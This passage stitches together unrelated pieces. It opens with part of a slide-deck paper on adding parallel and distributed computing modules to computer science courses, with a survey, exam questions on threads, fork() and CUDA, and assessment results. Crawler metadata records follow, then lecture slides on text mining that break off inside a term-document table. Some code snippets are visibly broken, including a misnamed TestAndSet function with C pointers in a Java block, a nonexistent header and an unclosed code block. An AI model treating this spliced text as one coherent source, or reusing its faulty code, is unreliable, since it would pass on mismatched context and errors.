pipelining, superscalar architectures, Multiprocessors and Multi-core processors, and GPU programming. Early Adopting Courses 1) CSC 119 Object Oriented Programming (core) 2) CSC 216 Computer Architecture and Organization (core) 3) CSC 312 Advanced Computer Architecture (core) 4) CSC 325 Operating Systems (core) 5) CSC 350 Organization of Programming Languages (core) 6) CSC 425 Parallel Computing (elective) CSC 119 Object Oriented Programming in Java - Covers inheritance, polymorphism, interfaces, exception handling, streams and file input/output, recursion, dynamic data structures (linked lists, stacks, queues, hash tables, graphs, trees) and associated algorithms - For supporting parallel computing, Java has the Thread class and the Runnable interface, and it also provides rich primitives with the java.util.concurrent packages, which include the fork/join framework. Students explored these features in Java for parallel computing. CSC 216 Computer Architecture and Organization • Covers the basic concepts of computer architecture which includes: – machine level representations of data – computer arithmetic – instruction set architecture and assembly language, – datapath and control – memory system – and bus architectures and I/O devices • A new PDC module was added to this course to introduce students to multi core processors and GPU hardware. Also, throughout the course, parallelism at different levels were discussed. CSC 312 Advanced Computer Architecture • This course may become an elective under the new curriculum. • Covers various advanced topics of PDC curriculum such as: – instruction level parallelism: pipelining and superscalar architectures – processor level parallelism: array processors, multi-processor and multi-computer systems. – Techniques to reduce instruction pipeline stalls, – Direct map and set associative caches are analyzed – Quantitative approaches of computer performance are emphasized. • A new PDC module was added to this course to introduce students to bench marks and how they can be used to differentiate between various parallel systems performance. CSC 325 Operating Systems • This course introduces the major concepts of process communication and synchronization, protection, performance measurement, and causes and evaluations of the problems associated with mutual exclusions and process synchronization among concurrent processes. It also, introduces and analyzes various operating systems in terms of processor management, memory management, device management, information management, and distributed systems management. • A PDC module was added to this course to extend process synchronization issues to parallel programming concepts. With this module, the course will provide students with parallel thread programming opportunities. CSC 350 Organization of Programming Languages • Covers several issues in language design, including typing regimens, data structure models, control structure models, abstraction, virtual machines, language translation, interpreters, compiler design, lexical analysis, parsing, symbol tables, declaration and storage management, code generation; and optimization techniques. • In this course, after a brief review Java features for supporting parallel computing (taught in CSC 119), parallel programming assignments were given for gaining hands-on experience. Generic concepts in parallel computing were also introduced. CSC 425 Parallel Computing • This is a newly developed elective. • Only one student registered for the Parallel Computing class offered last fall semester, which resulted in cancelling the class. • A study of hardware and software issues in parallel computing. Theoretical and practical survey of parallel processing, including a discussion of parallel architectures, parallel programming languages, and parallel algorithms. Programming on multiple parallel platforms in a higher-level parallel language. • In this course, students will learn how to write parallel programs on three different parallel architectures: i) shared memory model-thread programming; ii) Cluster- Message passing Computing; and iii) Multicore- GPU Programming. A Survey of six questions was distributed among ACM computer science students. Results reported as follows with Min=1 and Max=4: <table> <thead> <tr> <th>Question</th> <th>Average Score</th> </tr> </thead> <tbody> <tr> <td>Please, rate your current knowledge of PDC.</td> <td>1.4</td> </tr> <tr> <td>Please, rate the breadth of PDC topics covered in the computer science curriculum at JSU</td> <td>1.4</td> </tr> <tr> <td>Please, rate the depth of PDC topics covered in the computer science curriculum at JSU.</td> <td>1.5</td> </tr> <tr> <td>Please, rate your overall learning experience of PDC at the computer science department at JSU.</td> <td>1.5</td> </tr> <tr> <td>Will you be interested in pursuing a career that requires PDC knowledge?</td> <td>2.5</td> </tr> <tr> <td>Will you be interested in registering for Advanced PDC classes if offered during fall or spring semesters?</td> <td>3.0</td> </tr> </tbody> </table> Students Comments • “I do not have knowledge of PDC. It would be helpful if we learned about this topic in our classes. This could help with strengthening our programming skills. Activities or projects during class would be helpful”. • “I hope that there would be mentoring sessions with faculty to help students address the issue of being able to learn on our own different languages and principles of Computer Science”. • “One could provide real world Applications of PDC. If it is implemented in classes, make sure that you provide real world application as well as theory. The combination of both solidifies its importance and builds interest”. • “I think it is very relevant, but at the same time, I do not know anything about it. I just know that our curriculum is already filled with classes, and it is tough trying to manage those classes”. • “The topic should be touched in classes at every level. For a topic like this, the students should start learning about it as freshmen so that they can increase understanding of it over time”. • “PDC careers should be discussed more and more. More hands on activities”. • “We really did not talk about PDC in my undergraduate program. I would love to see it offered for students”. PDC Modules Inclusion 1) CSC 119 Object Oriented Programming: PDC topics like JAVA threads were emphasized in class. Problems were developed for students to work on outside classroom. 2) CSC 216 Computer Architecture and Organization: This course was taught twice a week. Since the class size was small (only 6 students), the instructor agreed with the students to add 5 minutes to each lecture. That provided the instructor with about 3 extra hours to cover PDC topics like multi core processors and GPU hardware. 3) CSC 312 Advanced Computer Architecture: The time to cover pipeline hazards was reduced to accommodate the inclusion of benchmarks (around 1.5 hours). Students were asked to submit 2 research papers: – A comprehensive survey of various benchmarks used to report performance of Desktop, Server and Embedded Systems. – Multi Core Processors issues such as caching, pipelining, energy consumption, Operating Systems, and performance. 4) CSC 325 Operating Systems: In order to create space to cover PDC topics of multi core programming and multi threading model, the following actions were taken: – Skip some subtopics not dependent on the important topics that ACM/IEEE 2013 suggested. Students can understand these subtopics by just reading them. – Problem sets were developed for students to study in groups outside classroom. PDC Modules Inclusion (continue) 5) CSC 350 Organization of Programming Languages: The time to cover the course topics is already limited. Students were given extra curriculum parallel programming assignment. Assessment Tools: CSC 119 Object Oriented Programming • Final Exam Questions Set: – How do you specify concurrent activities in JAVA? – What activities benefit from concurrent programming? – Describe the life cycle of a thread. – Write a program that demonstrates the use of a thread. • Programming Assignment: – Write a program that uses multiple threads to print at random intervals. Bonus Test on GPU Architecture and Computing: - What is heterogeneous system? Please provide an example? - How GPUs have evolved from special graphics processors to programmable general-purpose parallel processors? - What is GPU computing? - What is Basic Unified GPU Architecture? - What is CUDA? - What are the three CUDA Paradigms? - Please draw a block diagram to show the structure of a contemporary PC with Intel CPU. • Programming Assignments: 1. The following code is computing $y = ax + y$ with a serial loop, where $x$ and $y$ are arrays of length $n$ and $a$ is a scalar constant. ```c void saxpy_serial (int n, float alpha, float *x, float *y) { for (int i=0; i<n; i++) y[i] = alpha*x[i] + y[i]; } The code in the next line will invoke the serial function saxpy_serial. saxpy_serial(n, 2.0, x, y) Please write a CUDA kernel function to compute the same $y = ax + y$ in parallel. Please also show how to invoke the CUDA kernel. 2. The following CUDA kernel function utilizes three different levels of memory (global, shared and local). Please fill in the following blanks with a digit from 1 to 4 to indicate which is faster (1: fastest, 4 slowest). ```c --global-- void foo(float *x, float *y, float *z) { --shared-- float a, b, c; //a, b, c are shared memory float s, t, u; //s, t, u are local memory s = *x; //________ t = s; //________ a = b; //________ *y = *z; //________ } ``` Assessment Tools: CSC 312 Advanced Computer Architecture - **Exam1 Q1** Define the following terms briefly: - Flynn’s Taxonomy: - Processor Level Parallelism: - Instruction Pipelining: - **Exam3 Q1** An MIMD machine has m processors and m memory modules interconnected by means of a single shared-bus. Suppose that a processor tries to use the bus in a given cycle with probability, p. what is the probability that: - The bus is idle (zero requests)? - Exactly one request is made? - More than on request is made - **Exam3 Q2** what are the advantages and disadvantages of using a single shared-bus as an interconnection network in a multiprocessor system? - **Project1** : Provide a comprehensive survey of various benchmarks used to report performance of Desktop, Server and Embedded Systems. Show some comparative results. - **Project2** : Research the topic of Dual and Multi Core Processors; provide information about caching, pipelining, energy consumption and performance? • Exam 2- 2. Can a multithreaded solution using multiple user-level threads achieve better performance on a multiprocessor system than on a single-processor system? • Exam 2- 4. Write a structure of process synchronization solution with “TestAndSet.” ```java boolean TestAndSetSet (boolean *target) { boolean rv = *target; *target = TRUE; return rv; } ``` Shared boolean variable lock., initialized to false: Assessment Tools: CSC 325 Operating Systems (continue) Final 3. Fill in the following blanks to solve the Producer-Consumer Problem with the below condition: (i) Producer process produces information that is consumed by a consumer process; (ii) Bounded-buffer assumes that there is a fixed buffer size. Shared data semaphore full, empty, mutex; Initially: full = 0, empty = n, mutex = 1 Producer Process_i: do { .... produce an item in nextp .... ( ); ; );; wait(mutex); .... add nextp to buffer .... signal(mutex); ( ); ; ); ; } while (1); Consumer Process_j: do { wait(full) ( ); ; ); ; .... remove an item from buffer to nextc .... ( ); ; ); ; signal(empty); .... consume the item in nextc .... } while (1); Assessment Tools: CSC 325 Operating Systems (continue) • **Exam 1-2** Write three primary thread libraries. • **Exam 1-III-1**. Including the initial parent process, how many processes are created by the program shown below? To verify your answer, you need to draw a graph to show the spawning process. ```c #include <stdio.h> #include <unistdio.h> int main (){ /* for a child process */ fork(); /* for a child process */ fork(); /* for a child process */ fork(); /* for a child process */ fork(); /* and fork another */ fork(); return 0; } ``` Exam 1-III-2. Using the program below, identify the value of pid at lines A, B, C, and D. (Assume that the actual pids of the parent and child are 2400 and 2700, respectively) ```c #include <sys/types.h> #include <stdio.h> #include <unistd.h> int main (){ pid_t pid, pid1; pid=fork(); if(pid< 0){ /* error occurred */ fprintf(stderr, "Fork Failed"); return 1; } else if (pid == 0) { /* child process */ pid1 = getpid(); printf("child: pid = %d", pid); /* line A, pid= */ printf("child: pid1 = %d", pid1); /*line B, pid1= */ } else { /* Parent process */ pid1 = getpid(); printf("Parent: pid = %d", pid); /* line C, pid = */ printf("Parent: pid1 = %d", pid1); /*line D, pid1= */ } return 0; } ``` Assessment Tools: CSC 350 Organization of Programming Languages Read the following tutorial for concurrency and answer the following questions: http://docs.oracle.com/javase/tutorial/essential/concurrency/runthread.html 1. There are two ways to implement threads. Describe them. Also describe what the following 2 program segments do. ```java public class HelloRunnable implements Runnable { public void run() { System.out.println("Hello from a thread!"); } public static void main(String args[]) { (new Thread(new HelloRunnable())).start(); } } ``` ```java public class HelloThread extends Thread { public void run() { System.out.println("Hello from a thread!"); } public static void main(String args[]) { (new HelloThread()).start(); } } ``` 2. Describe what the following program segment does: ```java public class SleepMessages { public static void main(String args[]) throws InterruptedException { String importantInfo[] = { "Mares eat oats", "Does eat oats", "Little lambs eat ivy", "A kid will eat ivy too" }; for (int i = 0; i < importantInfo.length; i++) { // Pause for 4 seconds Thread.sleep(4000); // Print a message System.out.println(importantInfo[i]); } } } ``` # Assessment Topics <table> <thead> <tr> <th>Course Name</th> <th>PDC Topics</th> </tr> </thead> <tbody> <tr> <td>CSC 119 Object Oriented Programming</td> <td>Concurrent activities in Java, Java thread.</td> </tr> <tr> <td>CSC 312 Advanced Computer Architecture</td> <td>Flynn’s Taxonomy, Instruction Level and Processor Level Parallelism, Benchmarks.</td> </tr> <tr> <td>CSC 350 Organization of Programming Languages</td> <td>Understanding fundamental concepts in threads, Reading programs with threads.</td> </tr> </tbody> </table> ## Assessment Results <table> <thead> <tr> <th>Course Name</th> <th>[EX, EF, M, U] Vector</th> <th>Weighted Average</th> </tr> </thead> <tbody> <tr> <td>CSC 119 Object Oriented Programming</td> <td>[3, 0, 0, 1]</td> <td>2.87</td> </tr> <tr> <td>CSC 216 Computer Architecture and Organization</td> <td>[3, 0, 1, 1]</td> <td>3.00</td> </tr> <tr> <td>CSC 312 Advanced Computer Architecture</td> <td>[2, 4, 3, 1]</td> <td>2.70</td> </tr> <tr> <td>CSC 325 Operating Systems</td> <td>[8, 5, 1, 24]</td> <td>1.92</td> </tr> <tr> <td>CSC 350 Organization of Programming Languages</td> <td>[2, 1, 1, 0]</td> <td>3.25</td> </tr> </tbody> </table> Conclusions and Future Work • PDC modules were implemented in the aforementioned courses. • A presentation about PDC education for ACM computer science students was organized early in the fall semester. Students shared their views on how to integrate PDC into the computer science curriculum and had constructive feedback from students and faculty. • Two graduate students were motivated about PDC education and attended the EduHPC 14 workshop, where we presented some of our early experience of PDC education at JSU [3]. • Assessment data was collected at the end of the fall semester. The data showed that students were comfortably able to learn PDC concepts and were motivated by these topics to pursue a career or do research in the area of PDC. • To support our students with adequate PDC resources, a Tesla K40C, GPU hardware granted by NVIDIA Inc. [4] has been added to the Distributed Computing Laboratory. The GPU contains 2880 CUDA cores with 12 Giga Bytes of memory on the Tesla K40 and 400 GB HDD and another 192 CUDA cores on a Quadro 2000 GPU card. Combined, they provide adequate power to support simulations requiring high-power computing capacity. • Matlab [5] Parallel Computing Tool box will soon be available for our students. Internal university funding is also sought to continue this project in the coming semesters. • Course Continuous Improvement is a requirement that ABET accreditation teams always look for. Our Department FCARs (Faculty Course Assessment Reports) will include PDC modules to satisfy this requirement. References
{"Source-Url": "http://grid.cs.gsu.edu/~tcpp/curriculum/sites/default/files/EduHP-15.pdf", "len_cl100k_base": 4258, "olmocr-version": "0.1.53", "pdf-total-pages": 30, "total-fallback-pages": 0, "total-input-tokens": 44386, "total-output-tokens": 5693, "length": "2e12", "weborganizer": {"__label__adult": 0.000942707061767578, "__label__art_design": 0.0015230178833007812, "__label__crime_law": 0.001087188720703125, "__label__education_jobs": 0.347900390625, "__label__entertainment": 0.00026297569274902344, "__label__fashion_beauty": 0.000728607177734375, "__label__finance_business": 0.0009927749633789062, "__label__food_dining": 0.001247406005859375, "__label__games": 0.0021495819091796875, "__label__hardware": 0.005146026611328125, "__label__health": 0.00246429443359375, "__label__history": 0.0013103485107421875, "__label__home_hobbies": 0.0006871223449707031, "__label__industrial": 0.002292633056640625, "__label__literature": 0.0009207725524902344, "__label__politics": 0.0010728836059570312, "__label__religion": 0.001800537109375, "__label__science_tech": 0.1798095703125, "__label__social_life": 0.0005970001220703125, "__label__software": 0.00881195068359375, "__label__software_dev": 0.43310546875, "__label__sports_fitness": 0.0017175674438476562, "__label__transportation": 0.0026874542236328125, "__label__travel": 0.0006737709045410156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20135, 0.01506]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20135, 0.81455]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20135, 0.88156]], "google_gemma-3-12b-it_contains_pii": [[0, 263, false], [263, 435, null], [435, 734, null], [734, 1244, null], [1244, 1553, null], [1553, 2089, null], [2089, 2600, null], [2600, 3282, null], [3282, 3975, null], [3975, 4597, null], [4597, 5335, null], [5335, 6297, null], [6297, 7530, null], [7530, 8047, null], [8047, 8888, null], [8888, 9098, null], [9098, 9496, null], [9496, 9920, null], [9920, 11013, null], [11013, 12016, null], [12016, 12440, null], [12440, 13511, null], [13511, 14060, null], [14060, 14842, null], [14842, 15656, null], [15656, 16258, null], [16258, 17200, null], [17200, 17893, null], [17893, 19441, null], [19441, 20135, null]], "google_gemma-3-12b-it_is_public_document": [[0, 263, true], [263, 435, null], [435, 734, null], [734, 1244, null], [1244, 1553, null], [1553, 2089, null], [2089, 2600, null], [2600, 3282, null], [3282, 3975, null], [3975, 4597, null], [4597, 5335, null], [5335, 6297, null], [6297, 7530, null], [7530, 8047, null], [8047, 8888, null], [8888, 9098, null], [9098, 9496, null], [9496, 9920, null], [9920, 11013, null], [11013, 12016, null], [12016, 12440, null], [12440, 13511, null], [13511, 14060, null], [14060, 14842, null], [14842, 15656, null], [15656, 16258, null], [16258, 17200, null], [17200, 17893, null], [17893, 19441, null], [19441, 20135, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20135, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20135, null]], "pdf_page_numbers": [[0, 263, 1], [263, 435, 2], [435, 734, 3], [734, 1244, 4], [1244, 1553, 5], [1553, 2089, 6], [2089, 2600, 7], [2600, 3282, 8], [3282, 3975, 9], [3975, 4597, 10], [4597, 5335, 11], [5335, 6297, 12], [6297, 7530, 13], [7530, 8047, 14], [8047, 8888, 15], [8888, 9098, 16], [9098, 9496, 17], [9496, 9920, 18], [9920, 11013, 19], [11013, 12016, 20], [12016, 12440, 21], [12440, 13511, 22], [13511, 14060, 23], [14060, 14842, 24], [14842, 15656, 25], [15656, 16258, 26], [16258, 17200, 27], [17200, 17893, 28], [17893, 19441, 29], [19441, 20135, 30]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20135, 0.0719]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
29ad6822000b60741d98c087c91b8a9252cc1631
[REMOVED]
{"Source-Url": "https://iris.polito.it/retrieve/handle/11583/2624679/98369/2015_ESOCC_Verification.pdf", "len_cl100k_base": 5241, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 32171, "total-output-tokens": 6400, "length": "2e12", "weborganizer": {"__label__adult": 0.0004584789276123047, "__label__art_design": 0.0003333091735839844, "__label__crime_law": 0.0005087852478027344, "__label__education_jobs": 0.0007052421569824219, "__label__entertainment": 0.00014734268188476562, "__label__fashion_beauty": 0.0002218484878540039, "__label__finance_business": 0.0007882118225097656, "__label__food_dining": 0.00039076805114746094, "__label__games": 0.0006074905395507812, "__label__hardware": 0.0033016204833984375, "__label__health": 0.0010938644409179688, "__label__history": 0.00043845176696777344, "__label__home_hobbies": 0.0001310110092163086, "__label__industrial": 0.0009140968322753906, "__label__literature": 0.0003559589385986328, "__label__politics": 0.0004074573516845703, "__label__religion": 0.0004849433898925781, "__label__science_tech": 0.39990234375, "__label__social_life": 0.00014019012451171875, "__label__software": 0.020782470703125, "__label__software_dev": 0.56591796875, "__label__sports_fitness": 0.0003843307495117187, "__label__transportation": 0.0011377334594726562, "__label__travel": 0.0002734661102294922}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 27760, 0.03981]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 27760, 0.33381]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 27760, 0.91651]], "google_gemma-3-12b-it_contains_pii": [[0, 835, false], [835, 1623, null], [1623, 4045, null], [4045, 7584, null], [7584, 10836, null], [10836, 13153, null], [13153, 16583, null], [16583, 18486, null], [18486, 20371, null], [20371, 22816, null], [22816, 25038, null], [25038, 27760, null]], "google_gemma-3-12b-it_is_public_document": [[0, 835, true], [835, 1623, null], [1623, 4045, null], [4045, 7584, null], [7584, 10836, null], [10836, 13153, null], [13153, 16583, null], [16583, 18486, null], [18486, 20371, null], [20371, 22816, null], [22816, 25038, null], [25038, 27760, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 27760, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 27760, null]], "pdf_page_numbers": [[0, 835, 1], [835, 1623, 2], [1623, 4045, 3], [4045, 7584, 4], [7584, 10836, 5], [10836, 13153, 6], [13153, 16583, 7], [16583, 18486, 8], [18486, 20371, 9], [20371, 22816, 10], [22816, 25038, 11], [25038, 27760, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 27760, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
b4e4e28448c155c1044b36f7126cfb4b8aa75f3b
Data Mining I Text Mining Outline 1. What is Text Mining? 2. Text Preprocessing 3. Feature Creation 4. Feature Selection 5. Pattern Discovery Motivation for Text Mining Approximately 90% of the world’s data is held in unstructured formats. Source: Oracle Corporation Examples: - web pages - emails - customer complaint letters - corporate documents - scientific papers - books in digital libraries The extraction of implicit, previously unknown and potentially useful information from large amounts of textual resources. Some Text Mining Applications 1. Classification of news stories or web pages 2. Email and news filtering / SPAM detection 3. Sentiment analysis 4. Clustering documents or web pages 5. Search term auto-completion 6. Information extraction Mixture of Document Clustering and Classification Sentiment Analysis - The basic task in sentiment analysis is classifying the polarity of a given text at the document, sentence, or feature/aspect level. - Polarity values - positive, neutral, negative - likert scale (1 to 10) - Application examples - Document level - analysis of tweets about politicians - Feature/aspect level - analysis of product reviews Search Log Mining - Analysis of search queries issued by large user communities. - Applications 1. Search term auto-completion using association analysis 2. Query topic detection using classification Information Extraction - Information extraction is the task of automatically extracting structured information from unstructured or semi-structured documents. - Subtasks 1. Named Entity Recognition and Disambiguation - “The parliament in Berlin has decided …“ - Which parliament? Which Berlin? 2. Relationship Extraction - PERSON works for ORGANIZATION - PERSON located in LOCATION 3. Fact Extraction - CITY has population NUMBER - COMPANY has turnover NUMBER [Unit] Search versus Discovery Search/Query (Goal-oriented) Data Mining Structured Data Query Processing Information Retrieval Text Text Mining Discovery (Opportunistic) Data Mining The Text Mining Process 1. Text Preprocessing - Syntactic and/or semantic analysis 2. Feature Generation - Bag of words 3. Feature Selection - Reduce large number 4. Data Mining - Clustering - Classification - Association analysis 2. Text Preprocessing 1. Tokenization 2. Stopword Removal 3. Stemming 4. POS Tagging Syntactic and Linguistic Text Preprocessing - Simple Syntactic Processing - Text Cleanup (remove punctuation and HTML tags) - Tokenization (break text into single words or N-grams) - Advanced Linguistic Processing - Word Sense Disambiguation - Determine which sense a word is having. - Normalize synonyms (United States, USA, US) - Normalize pronouns (he, she, it) - Part Of Speech (POS) Tagging - Parse sentences according to grammar - Determine function of each term - e.g. John (noun) gave (verb) the (det) ball (noun). Stopword Removal - Many of the most frequently used words in English are likely to be **useless** for text mining. - These words are called *Stopwords*. - examples: the, of, and, to, an, is, that, … - typically text contains about 400 to 500 such words - for an application, an additional domain specific stopwords list may be constructed - Why should we remove stopwords? - Reduce data set size - stopwords account for 20-30% of total word count - Improve effectivity of text mining methods - stopwords may confuse the mining algorithm More Examples of Stopwords a about above across after again against all almost alone along already also although always am among an and another any anybody anyone anything anywhere are area areas aren't around as ask asked asking asks at away b back backed backing backs be became because become becomes been before began behind being beings below best better between big both but by c came can cannot can't case cases certain certainly clear clearly come could couldn't d did didn't differ different differently do does doesn't doing done don't down downed downing downs during e each early either end ended ending ends enough even evenly ever everybody everyone everywhere f face faces fact facts far felt few find finds first for four from full fully further furthered furthering furthers g gave general generally get gets give given gives go going good goods got greater greatest group grouped grouping groups h had hadn't has hasn't have haven't having he he'd he'll her here here's hers herself he's high higher highest him himself his how however how's i i'd if i'll i'm important in interest interested interesting interests into is isn't it its it's itself i've j just k keep keeps kind knew know known knows l large largely last later latest least less let lets let's like likely long longer longest m made make making man many may me member members men might more most mostly mr mrs much must mustn't my myself n necessary need needed needing needs never new newer newest next no nobody non noone nor not nothing now nowhere number numbers o of off often old older oldest on once one only open opened opening opens or order ordered ordering orders other others ought our ours ourselves out over own p part parted parting parts per perhaps place places point pointed pointing points possible present presented presenting presents problem problems put puts q quite r rather really right room rooms s said same saw say says second seconds see seem seemed seeming seems sees several shallshan't she she'd she'll she's should shouldn't show showed showing shows side sides since small smaller smallest so some somebody someone something somewhere state states still such sure t take taken than that that's the their theirs them themselves then there therefore there's these they they'd they'll they're they've thing things think thinks this those though thought thoughts three through thus to today together too took toward turn turned turning turns two u under until up upon us used uses v very w want wanted wanting wants was wasn't way ways we we'd well we'll wells went were we're weren't we've what's when what's where where's whether which while who whom who's whose why why's will with within without won't work worked working works would wouldn't x y year years yes yet you you'd you'll Stemming - Techniques to find the **stem of a word**. - Words: User, users, used, using ➔ Stem: use - Words: Engineering, engineered ➔ Stem: engineer - Usefulness for Text Mining - improve effectivity of text mining methods - matching of similar words - reduce term vector size - combing words with same stem may reduce the term vector as much as 40-50%. Some Basic Stemming Rules - remove endings - if a word ends with a consonant other than s, followed by an s, then delete s. - if a word ends in es, drop the s. - if a word ends in ing, delete the ing unless the remaining word consists only of one letter or of th. - If a word ends with ed, preceded by a consonant, delete the ed unless this leaves only a single letter. - …… - transform words - if a word ends with “ies” but not “eies” or “aies” then “ies \rightarrow y.” Preprocessing Operators in RapidMiner - To use the operators, you need to install the Text Processing Extension first. 3. Feature Generation Text Preprocessing Text Transformation (Feature Generation) Feature Selection Data Mining / Pattern Discovery Interpretation / Evaluation ### Term-Document Matrix | Term | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | Σ | |--------|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----| | oil | 5 | 12 | 2 | 1 | 1 | 7 | 3 | 3 | 5 | 9 | 5 | 4 | 5 | 4 | 3 | 4 | 5 | 3 | 3 | 1 | 85 | | price | 5 | 6 | 2 | 2 | 0 | 8 | 1 | 2 | 2 | 10 | 5 | 1 | 5 | 2 | 0 | 3 | 3 | 3 | 3 | 0 | 63 | | opec | 0 | 15 | 0 | 0 | 0 | 8 | 1 | 2 | 2 | 6 | 5 | 2 | 2 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 47 | | mln | 0 | 4 | 0 | 0 | 2 | 4 | 1 | 0 | 0 | 3 | 9 | 0 | 0 | 0 | 0 | 0 | 3 | 3 | 0 | 2 | 31 | | market | 2 | 5 | 0 | 0 | 0 | 3 | 0 | 2 | 0 | 10 | 1 | 2 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 30 | | barrel | 2 | 0 | 1 | 1 | 0 | 4 | 0 | 0 | 1 | 3 | 3 | 0 | 1 | 1 | 0 | 3 | 3 | 1 | 0 | 2 | 26 | | bpd | 0 | 4 | 0 | 0 | 0 | 7 | 0 | 0 | 0 | 2 | 8 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 5 | 0 | 23 | | dls | 2 | 0 | 1 | 2 | 2 | 2 | 1 | 0 | 0 | 4 | 2 | 0 | 0 | 0 | 0 | 1 | 1 | 5 | 0 | 0 | 23 | | crude | 2 | 0 | 2 | 3 | 0 | 2 | 0 | 0 | 0 | 5 | 2 | 0 | 2 | 0 | 0 | 0 | 2 | 0 | 1 | 21 | | saudi | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 5 | 7 | 1 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | | kuwait | 0 | 0 | 0 | 0 | 0 | 10 | 0 | 1 | 0 | 3 | 0 | 1 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | | offici | 0 | 0 | 0 | 0 | 0 | 5 | 1 | 1 | 0 | 1 | 4 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | | meet | 0 | 6 | 0 | 0 | 0 | 3 | 0 | 1 | 0 | 1 | 0 | 2 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | | pct | 0 | 0 | 0 | 0 | 2 | 0 | 2 | 2 | 2 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 2 | 14 | | product| 1 | 6 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 | | accord | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 | 1 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | | futur | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 1 | 3 | 1 | 2 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | | minist | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 1 | 3 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | | govern | 0 | 0 | 0 | 0 | 0 | 0 | 5 | 0 | 6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 | | month | 0 | 1 | 0 | 0 | 0 | 2 | 2 | 0 | 1 | 0 | 5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 | | report | 0 | 1 | 0 | 0 | 0 | 1 | 8 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 | | sheikh | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 5 | 2 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 | | indust | 0 | 2 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 2 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | | produc | 0 | 0 | 0 | 0 | 0 | 4 | 1 | 1 | 0 | 3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | | quota | 0 | 2 | 0 | 0 | 0 | 4 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | | reserv | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 | 3 | 0 | 0 | 10 | | world | 0 | 1 | 0 | 0 | 0 | 1 | 3 | 0 | 